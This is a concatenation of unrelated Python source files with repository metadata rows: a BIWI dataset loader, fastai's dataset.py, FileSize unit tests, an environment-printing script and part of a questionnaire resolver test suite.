def readBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, printing = True):
if subjectList == None: subjectList = [s for s in range(1, 25)]
biwiFrames = readBIWI_Frames(dataFolder = dataFolder, subjectList = subjectList, preprocess_input = preprocess_input)
biwiAnnos = readBIWI_Annos(tarFile = labelsTarFile, subjectList = subjectList)
scalers = BIWI_Lebel_Scalers #getAnnoScalers(biwiAnnos, tarFile = labelsTarFile, subjectList = subjectList)
labeledFrames = lambda frames, labels: labelFramesForSubj(frames, labels, timesteps, overlapping, scaling, scalers)
biwi = (labeledFrames(frames, biwiAnnos[subj]) for subj, frames in biwiFrames.items())
if printing: print('All frames and annotations from ' + str(len(subjectList)) + ' datasets have been read by ' + now())
return biwi
#################### GeneratorForBIWIDataset ####################
def generatorForBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
samples_per_epoch = 0
if shuffle and subjectList != None: random.shuffle(subjectList)
biwi = readBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, printing = False)
gen = itertools.chain()
for inputMatrix, labels in biwi:
samples_per_epoch += len(inputMatrix)
z = list(zip(inputMatrix, labels))
if shuffle: random.shuffle(z)
data = ((frame, label) for frame, label in z)
gen = itertools.chain(gen, data)
return samples_per_epoch, gen
def genBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
samples_per_epoch = 0
if shuffle and subjectList != None: random.shuffle(subjectList)
biwi = readBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, printing = False)
fr = itertools.chain()
lbl = itertools.chain()
for inputMatrix, labels in biwi:
samples_per_epoch += len(inputMatrix)
z = list(zip(inputMatrix, labels))
if shuffle: random.shuffle(z)
f = (frame for frame, label in z)
l = (label for frame, label in z)
fr = itertools.chain(fr, f)
lbl = itertools.chain(lbl, l)
return samples_per_epoch, fr, lbl
def batchGeneratorForBIWIDataset(batch_size, output_begin, num_outputs, dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
samples_count = 0
while True:
if samples_count == 0:
samples_per_epoch, gen = generatorForBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, shuffle)
c = 0
frames_batch, labels_batch = numpy.zeros((batch_size, 224, 224, 3)), numpy.zeros((batch_size, num_outputs))
for frame, label in gen:
if c < batch_size:
frames_batch[c], labels_batch[c] = frame, label[output_begin:output_begin+num_outputs]
c += 1
else:
samples_count += batch_size
if samples_count == samples_per_epoch:
samples_count = 0
yield frames_batch, labels_batch
def getGeneratorsForBIWIDataset(epochs, dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
def generate(): return generatorForBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, shuffle)
biwiGenerators = (generate() for e in range(epochs+1))
samples_per_epoch, gen = next(biwiGenerators)
return samples_per_epoch, biwiGenerators
def batchGeneratorFromBIWIGenerators(gens, batch_size, output_begin, num_outputs):
for samples_per_epoch, g in gens:
c = 0
frames_batch, labels_batch = numpy.zeros((batch_size, 224, 224, 3)), numpy.zeros((batch_size, num_outputs))
for frame, label in g:
if c < batch_size:
frames_batch[c], labels_batch[c] = frame, label[output_begin:output_begin+num_outputs]
c += 1
else:
yield frames_batch, labels_batch
def countGeneratorForBIWIDataset():
gen = generatorForBIWIDataset()
c, f, l = 0, 0, 0
for frame, label in gen:
c, f, l = c+1, frame.shape, label.shape
print(c, f, l) # 15677 (224, 224, 3) (6,)
def printSamplesFromBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, preprocess_input = None):
biwi = readBIWIDataset(dataFolder, labelsTarFile, subjectList = subjectList, timesteps = 10, overlapping = True, preprocess_input = preprocess_input)
for subj, (inputMatrix, labels) in enumerate(biwi):
print(subj+1, inputMatrix.shape, labels.shape)
#################### Testing ####################
def main():
showSampleFrames(1)
#printSampleAnnos(count = -1)
#printSampleAnnosForSubj(1, count = -1)
#printSamplesFromBIWIDataset(subjectList = [1])
# readBIWIDataset(dataFolder = BIWI_SnippedData_file, labelsTarFile = BIWI_Lebels_file_Local)
# countGeneratorForBIWIDataset()
if __name__ == "__main__":
main()
print('Done') | 48.139344 | 253 | 0.685595 |
8113a8cba2bcf2286cd0500e071beb5cb68e6eef | 20,221 | py | Python | fastai/dataset.py | DeepBodapati/fastai | 3cfa9361ee1daadeb8a9df540c2da550f77a2dc2 | [
"Apache-2.0"
] | null | null | null | fastai/dataset.py | DeepBodapati/fastai | 3cfa9361ee1daadeb8a9df540c2da550f77a2dc2 | [
"Apache-2.0"
] | null | null | null | fastai/dataset.py | DeepBodapati/fastai | 3cfa9361ee1daadeb8a9df540c2da550f77a2dc2 | [
"Apache-2.0"
] | null | null | null | import csv
from .imports import *
from .torch_imports import *
from .core import *
from .transforms import *
from .layer_optimizer import *
from .dataloader import DataLoader
def get_cv_idxs(n, cv_idx=0, val_pct=0.2, seed=42):
""" Get a list of index values for Validation set from a dataset
Arguments:
n : int, Total number of elements in the data set.
cv_idx : int, starting index [idx_start = cv_idx*int(val_pct*n)]
val_pct : (int, float), validation set percentage
seed : seed value for RandomState
Returns:
list of indexes
"""
np.random.seed(seed)
n_val = int(val_pct*n)
idx_start = cv_idx*n_val
idxs = np.random.permutation(n)
return idxs[idx_start:idx_start+n_val]
def resize_img(fname, targ, path, new_path):
"""
Enlarge or shrink a single image to scale, such that the smaller of the height or width dimension is equal to targ.
"""
dest = os.path.join(path,new_path,str(targ),fname)
if os.path.exists(dest): return
im = Image.open(os.path.join(path, fname)).convert('RGB')
r,c = im.size
ratio = targ/min(r,c)
sz = (scale_to(r, ratio, targ), scale_to(c, ratio, targ))
os.makedirs(os.path.split(dest)[0], exist_ok=True)
im.resize(sz, Image.LINEAR).save(dest)
def resize_imgs(fnames, targ, path, new_path):
"""
Enlarge or shrink a set of images in the same directory to scale, such that the smaller of the height or width dimension is equal to targ.
Note:
-- This function is multithreaded for efficiency.
-- When destination file or folder already exist, function exists without raising an error.
"""
if not os.path.exists(os.path.join(path,new_path,str(targ),fnames[0])):
with ThreadPoolExecutor(8) as e:
ims = e.map(lambda x: resize_img(x, targ, path, new_path), fnames)
for x in tqdm(ims, total=len(fnames), leave=False): pass
return os.path.join(path,new_path,str(targ))
def read_dir(path, folder):
""" Returns a list of relative file paths to `path` for all files within `folder` """
full_path = os.path.join(path, folder)
fnames = glob(f"{full_path}/*.*")
directories = glob(f"{full_path}/*/")
if any(fnames):
return [os.path.relpath(f,path) for f in fnames]
elif any(directories):
raise FileNotFoundError("{} has subdirectories but contains no files. Is your directory structure is correct?".format(full_path))
else:
raise FileNotFoundError("{} folder doesn't exist or is empty".format(full_path))
def read_dirs(path, folder):
'''
Fetches name of all files in path in long form, and labels associated by extrapolation of directory names.
'''
lbls, fnames, all_lbls = [], [], []
full_path = os.path.join(path, folder)
for lbl in sorted(os.listdir(full_path)):
if lbl not in ('.ipynb_checkpoints','.DS_Store'):
all_lbls.append(lbl)
for fname in os.listdir(os.path.join(full_path, lbl)):
if fname not in ('.DS_Store'):
fnames.append(os.path.join(folder, lbl, fname))
lbls.append(lbl)
return fnames, lbls, all_lbls
def n_hot(ids, c):
'''
one hot encoding by index. Returns array of length c, where all entries are 0, except for the indecies in ids
'''
res = np.zeros((c,), dtype=np.float32)
res[ids] = 1
return res
def folder_source(path, folder):
"""
Returns the filenames and labels for a folder within a path
Returns:
-------
fnames: a list of the filenames within `folder`
all_lbls: a list of all of the labels in `folder`, where the # of labels is determined by the # of directories within `folder`
lbl_arr: a numpy array of the label indices in `all_lbls`
"""
fnames, lbls, all_lbls = read_dirs(path, folder)
lbl2idx = {lbl:idx for idx,lbl in enumerate(all_lbls)}
idxs = [lbl2idx[lbl] for lbl in lbls]
lbl_arr = np.array(idxs, dtype=int)
return fnames, lbl_arr, all_lbls
def parse_csv_labels(fn, skip_header=True, cat_separator = ' '):
"""Parse filenames and label sets from a CSV file.
This method expects that the csv file at path :fn: has two columns. If it
has a header, :skip_header: should be set to True. The labels in the
label set are expected to be space separated.
Arguments:
fn: Path to a CSV file.
skip_header: A boolean flag indicating whether to skip the header.
Returns:
a two-tuple of (
image filenames,
a dictionary of filenames and corresponding labels
)
.
:param cat_separator: the separator for the categories column
"""
df = pd.read_csv(fn, index_col=0, header=0 if skip_header else None, dtype=str)
fnames = df.index.values
df.iloc[:,0] = df.iloc[:,0].str.split(cat_separator)
return fnames, list(df.to_dict().values())[0]
def nhot_labels(label2idx, csv_labels, fnames, c):
all_idx = {k: n_hot([label2idx[o] for o in v], c)
for k,v in csv_labels.items()}
return np.stack([all_idx[o] for o in fnames])
def csv_source(folder, csv_file, skip_header=True, suffix='', continuous=False):
fnames,csv_labels = parse_csv_labels(csv_file, skip_header)
return dict_source(folder, fnames, csv_labels, suffix, continuous)
def dict_source(folder, fnames, csv_labels, suffix='', continuous=False):
all_labels = sorted(list(set(p for o in csv_labels.values() for p in o)))
full_names = [os.path.join(folder,str(fn)+suffix) for fn in fnames]
if continuous:
label_arr = np.array([np.array(csv_labels[i]).astype(np.float32)
for i in fnames])
else:
label2idx = {v:k for k,v in enumerate(all_labels)}
label_arr = nhot_labels(label2idx, csv_labels, fnames, len(all_labels))
is_single = np.all(label_arr.sum(axis=1)==1)
if is_single: label_arr = np.argmax(label_arr, axis=1)
return full_names, label_arr, all_labels
class BaseDataset(Dataset):
"""An abstract class representing a fastai dataset. Extends torch.utils.data.Dataset."""
def __init__(self, transform=None):
self.transform = transform
self.n = self.get_n()
self.c = self.get_c()
self.sz = self.get_sz()
def get1item(self, idx):
x,y = self.get_x(idx),self.get_y(idx)
return self.get(self.transform, x, y)
def __getitem__(self, idx):
if isinstance(idx,slice):
xs,ys = zip(*[self.get1item(i) for i in range(*idx.indices(self.n))])
return np.stack(xs),ys
return self.get1item(idx)
def __len__(self): return self.n
def get(self, tfm, x, y):
return (x,y) if tfm is None else tfm(x,y)
@abstractmethod
def get_n(self):
"""Return number of elements in the dataset == len(self)."""
raise NotImplementedError
@abstractmethod
def get_c(self):
"""Return number of classes in a dataset."""
raise NotImplementedError
@abstractmethod
def get_sz(self):
"""Return maximum size of an image in a dataset."""
raise NotImplementedError
@abstractmethod
def get_x(self, i):
"""Return i-th example (image, wav, etc)."""
raise NotImplementedError
@abstractmethod
def get_y(self, i):
"""Return i-th label."""
raise NotImplementedError
@property
def is_multi(self):
"""Returns true if this data set contains multiple labels per sample."""
return False
@property
def is_reg(self):
"""True if the data set is used to train regression models."""
return False
def open_image(fn):
""" Opens an image using OpenCV given the file path.
Arguments:
fn: the file path of the image
Returns:
The image in RGB format as numpy array of floats normalized to range between 0.0 - 1.0
"""
flags = cv2.IMREAD_UNCHANGED+cv2.IMREAD_ANYDEPTH+cv2.IMREAD_ANYCOLOR
if not os.path.exists(fn):
raise OSError('No such file or directory: {}'.format(fn))
elif os.path.isdir(fn):
raise OSError('Is a directory: {}'.format(fn))
else:
#res = np.array(Image.open(fn), dtype=np.float32)/255
#if len(res.shape)==2: res = np.repeat(res[...,None],3,2)
#return res
try:
if str(fn).startswith("http"):
req = urllib.urlopen(str(fn))
image = np.asarray(bytearray(resp.read()), dtype="uint8")
im = cv2.imdecode(image, flags).astype(np.float32)/255
else:
im = cv2.imread(str(fn), flags).astype(np.float32)/255
if im is None: raise OSError(f'File not recognized by opencv: {fn}')
return cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
except Exception as e:
raise OSError('Error handling image at: {}'.format(fn)) from e
class FilesDataset(BaseDataset):
def __init__(self, fnames, transform, path):
self.path,self.fnames = path,fnames
super().__init__(transform)
def get_sz(self): return self.transform.sz
def get_x(self, i): return open_image(os.path.join(self.path, self.fnames[i]))
def get_n(self): return len(self.fnames)
def resize_imgs(self, targ, new_path):
dest = resize_imgs(self.fnames, targ, self.path, new_path)
return self.__class__(self.fnames, self.y, self.transform, dest)
def denorm(self,arr):
"""Reverse the normalization done to a batch of images.
Arguments:
arr: of shape/size (N,3,sz,sz)
"""
if type(arr) is not np.ndarray: arr = to_np(arr)
if len(arr.shape)==3: arr = arr[None]
return self.transform.denorm(np.rollaxis(arr,1,4))
class FilesArrayDataset(FilesDataset):
def __init__(self, fnames, y, transform, path):
self.y=y
assert(len(fnames)==len(y))
super().__init__(fnames, transform, path)
def get_y(self, i): return self.y[i]
def get_c(self):
return self.y.shape[1] if len(self.y.shape)>1 else 0
class FilesIndexArrayDataset(FilesArrayDataset):
def get_c(self): return int(self.y.max())+1
class FilesNhotArrayDataset(FilesArrayDataset):
@property
def is_multi(self): return True
class FilesIndexArrayRegressionDataset(FilesArrayDataset):
def is_reg(self): return True
class ArraysDataset(BaseDataset):
def __init__(self, x, y, transform):
self.x,self.y=x,y
assert(len(x)==len(y))
super().__init__(transform)
def get_x(self, i): return self.x[i]
def get_y(self, i): return self.y[i]
def get_n(self): return len(self.y)
def get_sz(self): return self.x.shape[1]
class ArraysIndexDataset(ArraysDataset):
def get_c(self): return int(self.y.max())+1
def get_y(self, i): return self.y[i]
class ArraysNhotDataset(ArraysDataset):
def get_c(self): return self.y.shape[1]
@property
def is_multi(self): return True
class ModelData():
"""Encapsulates DataLoaders and Datasets for training, validation, test. Base class for fastai *Data classes."""
def __init__(self, path, trn_dl, val_dl, test_dl=None):
self.path,self.trn_dl,self.val_dl,self.test_dl = path,trn_dl,val_dl,test_dl
@classmethod
def from_dls(cls, path,trn_dl,val_dl,test_dl=None):
#trn_dl,val_dl = DataLoader(trn_dl),DataLoader(val_dl)
#if test_dl: test_dl = DataLoader(test_dl)
return cls(path, trn_dl, val_dl, test_dl)
@property
def is_reg(self): return self.trn_ds.is_reg
@property
def is_multi(self): return self.trn_ds.is_multi
@property
def trn_ds(self): return self.trn_dl.dataset
@property
def val_ds(self): return self.val_dl.dataset
@property
def test_ds(self): return self.test_dl.dataset
@property
def trn_y(self): return self.trn_ds.y
@property
def val_y(self): return self.val_ds.y
class ImageData(ModelData):
def __init__(self, path, datasets, bs, num_workers, classes):
trn_ds,val_ds,fix_ds,aug_ds,test_ds,test_aug_ds = datasets
self.path,self.bs,self.num_workers,self.classes = path,bs,num_workers,classes
self.trn_dl,self.val_dl,self.fix_dl,self.aug_dl,self.test_dl,self.test_aug_dl = [
self.get_dl(ds,shuf) for ds,shuf in [
(trn_ds,True),(val_ds,False),(fix_ds,False),(aug_ds,False),
(test_ds,False),(test_aug_ds,False)
]
]
def get_dl(self, ds, shuffle):
if ds is None: return None
return DataLoader(ds, batch_size=self.bs, shuffle=shuffle,
num_workers=self.num_workers, pin_memory=False)
@property
def sz(self): return self.trn_ds.sz
@property
def c(self): return self.trn_ds.c
def resized(self, dl, targ, new_path):
return dl.dataset.resize_imgs(targ,new_path) if dl else None
def resize(self, targ_sz, new_path='tmp'):
new_ds = []
dls = [self.trn_dl,self.val_dl,self.fix_dl,self.aug_dl]
if self.test_dl: dls += [self.test_dl, self.test_aug_dl]
else: dls += [None,None]
t = tqdm_notebook(dls)
for dl in t: new_ds.append(self.resized(dl, targ_sz, new_path))
t.close()
return self.__class__(new_ds[0].path, new_ds, self.bs, self.num_workers, self.classes)
@staticmethod
def get_ds(fn, trn, val, tfms, test=None, **kwargs):
res = [
fn(trn[0], trn[1], tfms[0], **kwargs), # train
fn(val[0], val[1], tfms[1], **kwargs), # val
fn(trn[0], trn[1], tfms[1], **kwargs), # fix
fn(val[0], val[1], tfms[0], **kwargs) # aug
]
if test is not None:
if isinstance(test, tuple):
test_lbls = test[1]
test = test[0]
else:
if len(trn[1].shape) == 1:
test_lbls = np.zeros((len(test),1))
else:
test_lbls = np.zeros((len(test),trn[1].shape[1]))
res += [
fn(test, test_lbls, tfms[1], **kwargs), # test
fn(test, test_lbls, tfms[0], **kwargs) # test_aug
]
else: res += [None,None]
return res
class ImageClassifierData(ImageData):
@classmethod
def from_arrays(cls, path, trn, val, bs=64, tfms=(None,None), classes=None, num_workers=4, test=None):
""" Read in images and their labels given as numpy arrays
Arguments:
path: a root path of the data (used for storing trained models, precomputed values, etc)
trn: a tuple of training data matrix and target label/classification array (e.g. `trn=(x,y)` where `x` has the
shape of `(5000, 784)` and `y` has the shape of `(5000,)`)
val: a tuple of validation data matrix and target label/classification array.
bs: batch size
tfms: transformations (for data augmentations). e.g. output of `tfms_from_model`
classes: a list of all labels/classifications
num_workers: a number of workers
test: a matrix of test data (the shape should match `trn[0]`)
Returns:
ImageClassifierData
"""
datasets = cls.get_ds(ArraysIndexDataset, trn, val, tfms, test=test)
return cls(path, datasets, bs, num_workers, classes=classes)
@classmethod
def from_paths(cls, path, bs=64, tfms=(None,None), trn_name='train', val_name='valid', test_name=None, test_with_labels=False, num_workers=8):
""" Read in images and their labels given as sub-folder names
Arguments:
path: a root path of the data (used for storing trained models, precomputed values, etc)
bs: batch size
tfms: transformations (for data augmentations). e.g. output of `tfms_from_model`
trn_name: a name of the folder that contains training images.
val_name: a name of the folder that contains validation images.
test_name: a name of the folder that contains test images.
num_workers: number of workers
Returns:
ImageClassifierData
"""
assert not(tfms[0] is None or tfms[1] is None), "please provide transformations for your train and validation sets"
trn,val = [folder_source(path, o) for o in (trn_name, val_name)]
if test_name:
test = folder_source(path, test_name) if test_with_labels else read_dir(path, test_name)
else: test = None
datasets = cls.get_ds(FilesIndexArrayDataset, trn, val, tfms, path=path, test=test)
return cls(path, datasets, bs, num_workers, classes=trn[2])
@classmethod
def from_csv(cls, path, folder, csv_fname, bs=64, tfms=(None,None),
val_idxs=None, suffix='', test_name=None, continuous=False, skip_header=True, num_workers=8):
""" Read in images and their labels given as a CSV file.
This method should be used when training image labels are given in an CSV file as opposed to
sub-directories with label names.
Arguments:
path: a root path of the data (used for storing trained models, precomputed values, etc)
folder: a name of the folder in which training images are contained.
csv_fname: a name of the CSV file which contains target labels.
bs: batch size
tfms: transformations (for data augmentations). e.g. output of `tfms_from_model`
val_idxs: index of images to be used for validation. e.g. output of `get_cv_idxs`.
If None, default arguments to get_cv_idxs are used.
suffix: suffix to add to image names in CSV file (sometimes CSV only contains the file name without file
extension e.g. '.jpg' - in which case, you can set suffix as '.jpg')
test_name: a name of the folder which contains test images.
continuous: TODO
skip_header: skip the first row of the CSV file.
num_workers: number of workers
Returns:
ImageClassifierData
"""
assert not (tfms[0] is None or tfms[1] is None), "please provide transformations for your train and validation sets"
assert not (os.path.isabs(folder)), "folder needs to be a relative path"
fnames,y,classes = csv_source(folder, csv_fname, skip_header, suffix, continuous=continuous)
return cls.from_names_and_array(path, fnames, y, classes, val_idxs, test_name,
num_workers=num_workers, suffix=suffix, tfms=tfms, bs=bs, continuous=continuous)
@classmethod
def from_names_and_array(cls, path, fnames,y,classes, val_idxs=None, test_name=None,
num_workers=8, suffix='', tfms=(None,None), bs=64, continuous=False):
val_idxs = get_cv_idxs(len(fnames)) if val_idxs is None else val_idxs
((val_fnames,trn_fnames),(val_y,trn_y)) = split_by_idx(val_idxs, np.array(fnames), y)
test_fnames = read_dir(path, test_name) if test_name else None
if continuous: f = FilesIndexArrayRegressionDataset
else:
f = FilesIndexArrayDataset if len(trn_y.shape)==1 else FilesNhotArrayDataset
datasets = cls.get_ds(f, (trn_fnames,trn_y), (val_fnames,val_y), tfms,
path=path, test=test_fnames)
return cls(path, datasets, bs, num_workers, classes=classes)
def split_by_idx(idxs, *a):
"""
Split each array passed as *a, to a pair of arrays like this (elements selected by idxs, the remaining elements)
This can be used to split multiple arrays containing training data to validation and training set.
:param idxs [int]: list of indexes selected
:param a list: list of np.array, each array should have same amount of elements in the first dimension
:return: list of tuples, each containing a split of corresponding array from *a.
First element of each tuple is an array composed from elements selected by idxs,
second element is an array of remaining elements.
"""
mask = np.zeros(len(a[0]),dtype=bool)
mask[np.array(idxs)] = True
return [(o[mask],o[~mask]) for o in a]
| 40.523046 | 146 | 0.642154 |
673354e3055a7b1d71b08746c1c94df14e4db352 | 4,429 | py | Python | TestFileSize1000_3.py | ytyaru/Python.FileSize.201702071138 | 569c45d5e9b91befbaece50520eb69955e148c65 | [
"CC0-1.0"
] | null | null | null | TestFileSize1000_3.py | ytyaru/Python.FileSize.201702071138 | 569c45d5e9b91befbaece50520eb69955e148c65 | [
"CC0-1.0"
] | 6 | 2017-02-09T00:54:50.000Z | 2017-02-09T10:56:13.000Z | TestFileSize1000_3.py | ytyaru/Python.FileSize.201702071138 | 569c45d5e9b91befbaece50520eb69955e148c65 | [
"CC0-1.0"
] | null | null | null | import unittest
import FileSize
from decimal import Decimal
class TestFileSize1000_3(unittest.TestCase):
def test_999(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 999
self.assertEqual(self.__target.Get(actual), "999 B")
def test_1000(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000
self.assertEqual(self.__target.Get(actual), "1 KB")
def test_1023(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1023
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1024(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1024
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1000KB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000 - 1
self.assertEqual(self.__target.Get(actual), "999.99 KB")
def test_1MB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000
self.assertEqual(self.__target.Get(actual), "1 MB")
def test_1000MB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 MB")
def test_1GB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000)
self.assertEqual(self.__target.Get(actual), "1 GB")
def test_1000GB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 GB")
def test_1TB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000)
self.assertEqual(self.__target.Get(actual), "1 TB")
def test_1000TB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 TB")
def test_1PB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000)
self.assertEqual(self.__target.Get(actual), "1 PB")
def test_1000PB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 PB")
def test_1EB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000)
self.assertEqual(self.__target.Get(actual), "1 EB")
def test_1000EB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 EB")
def test_1ZB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000)
self.assertEqual(self.__target.Get(actual), "1 ZB")
def test_1000ZB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 ZB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
def test_1000YB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 8) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 YB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
| 47.117021 | 88 | 0.671032 |
cd9a73d95108ad89864474bf0fd85766c9edfd0d | 696 | py | Python | scripts/show_environment.py | lmenou/py-pde | 3899cba0481657ea7b3d5c05e318d0b851bbe8cd | [
"MIT"
] | 163 | 2020-03-30T09:26:32.000Z | 2022-03-31T12:22:18.000Z | scripts/show_environment.py | lmenou/py-pde | 3899cba0481657ea7b3d5c05e318d0b851bbe8cd | [
"MIT"
] | 127 | 2020-03-31T15:33:15.000Z | 2022-03-30T19:27:47.000Z | scripts/show_environment.py | lmenou/py-pde | 3899cba0481657ea7b3d5c05e318d0b851bbe8cd | [
"MIT"
] | 37 | 2020-03-10T18:54:22.000Z | 2022-03-29T14:45:40.000Z | #!/usr/bin/env python3
"""
This script shows important information about the current python environment and the
associated installed packages. This information can be helpful in understanding issues
that occur with the package
"""
import sys
from pathlib import Path
PACKAGE_PATH = Path(__file__).resolve().parents[1]
sys.path.append(str(PACKAGE_PATH))
from pde import environment
env = environment()
for category, data in env.items():
if hasattr(data, "items"):
print(f"\n{category}:")
for key, value in data.items():
print(f" {key}: {value}")
else:
data_formatted = data.replace("\n", "\n ")
print(f"{category}: {data_formatted}")
| 26.769231 | 86 | 0.682471 |
442ff9956300f476d06723650adf00e18c5aaad8 | 14,636 | py | Python | tests/app/questionnaire/test_value_source_resolver.py | pricem14pc/eq-questionnaire-runner | 54cc2947ba181a2673ea1fb7cf6b4acdd609e06b | [
"MIT"
] | null | null | null | tests/app/questionnaire/test_value_source_resolver.py | pricem14pc/eq-questionnaire-runner | 54cc2947ba181a2673ea1fb7cf6b4acdd609e06b | [
"MIT"
] | null | null | null | tests/app/questionnaire/test_value_source_resolver.py | pricem14pc/eq-questionnaire-runner | 54cc2947ba181a2673ea1fb7cf6b4acdd609e06b | [
"MIT"
] | null | null | null | from typing import Mapping, Optional, Union
from unittest.mock import Mock
import pytest
from app.data_models import AnswerStore, ListStore
from app.data_models.answer import Answer
from app.questionnaire import Location, QuestionnaireSchema
from app.questionnaire.location import InvalidLocationException
from app.questionnaire.relationship_location import RelationshipLocation
from app.questionnaire.value_source_resolver import ValueSourceResolver
from tests.app.data_model.test_answer import ESCAPED_CONTENT, HTML_CONTENT
def get_list_items(num: int):
return [f"item-{i}" for i in range(1, num + 1)]
def get_mock_schema():
schema = Mock(
QuestionnaireSchema(
{
"questionnaire_flow": {
"type": "Linear",
"options": {"summary": {"collapsible": False}},
}
}
)
)
return schema
def get_value_source_resolver(
schema: QuestionnaireSchema = None,
answer_store: AnswerStore = AnswerStore(),
list_store: ListStore = ListStore(),
metadata: Optional[dict] = None,
response_metadata: Mapping = None,
location: Union[Location, RelationshipLocation] = Location(
section_id="test-section", block_id="test-block"
),
list_item_id: Optional[str] = None,
routing_path_block_ids: Optional[list] = None,
use_default_answer=False,
escape_answer_values=False,
):
if not schema:
schema = get_mock_schema()
schema.is_repeating_answer = Mock(return_value=bool(list_item_id))
if not use_default_answer:
schema.get_default_answer = Mock(return_value=None)
return ValueSourceResolver(
answer_store=answer_store,
list_store=list_store,
metadata=metadata,
response_metadata=response_metadata,
schema=schema,
location=location,
list_item_id=list_item_id,
routing_path_block_ids=routing_path_block_ids,
use_default_answer=use_default_answer,
escape_answer_values=escape_answer_values,
)
def test_answer_source():
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore([{"answer_id": "some-answer", "value": "Yes"}]),
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "some-answer"}
)
== "Yes"
)
def test_answer_source_with_dict_answer_selector():
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore(
[
{
"answer_id": "some-answer",
"value": {"years": 1, "months": 10},
}
]
),
)
assert (
value_source_resolver.resolve(
{
"source": "answers",
"identifier": "some-answer",
"selector": "years",
}
)
== 1
)
def test_answer_source_with_list_item_id_no_list_item_selector():
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore(
[{"answer_id": "some-answer", "list_item_id": "item-1", "value": "Yes"}]
),
list_item_id="item-1",
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "some-answer"}
)
== "Yes"
)
def test_list_item_id_ignored_if_answer_not_in_list_collector_or_repeat():
schema = get_mock_schema()
schema.is_repeating_answer = Mock(return_value=False)
value_source_resolver = get_value_source_resolver(
schema=schema,
answer_store=AnswerStore([{"answer_id": "some-answer", "value": "Yes"}]),
list_item_id="item-1",
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "some-answer"}
)
== "Yes"
)
def test_answer_source_with_list_item_selector_location():
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore(
[
{
"answer_id": "some-answer",
"list_item_id": "item-1",
"value": "Yes",
}
]
),
location=Location(
section_id="some-section", block_id="some-block", list_item_id="item-1"
),
)
assert (
value_source_resolver.resolve(
{
"source": "answers",
"identifier": "some-answer",
"list_item_selector": {
"source": "location",
"identifier": "list_item_id",
},
}
)
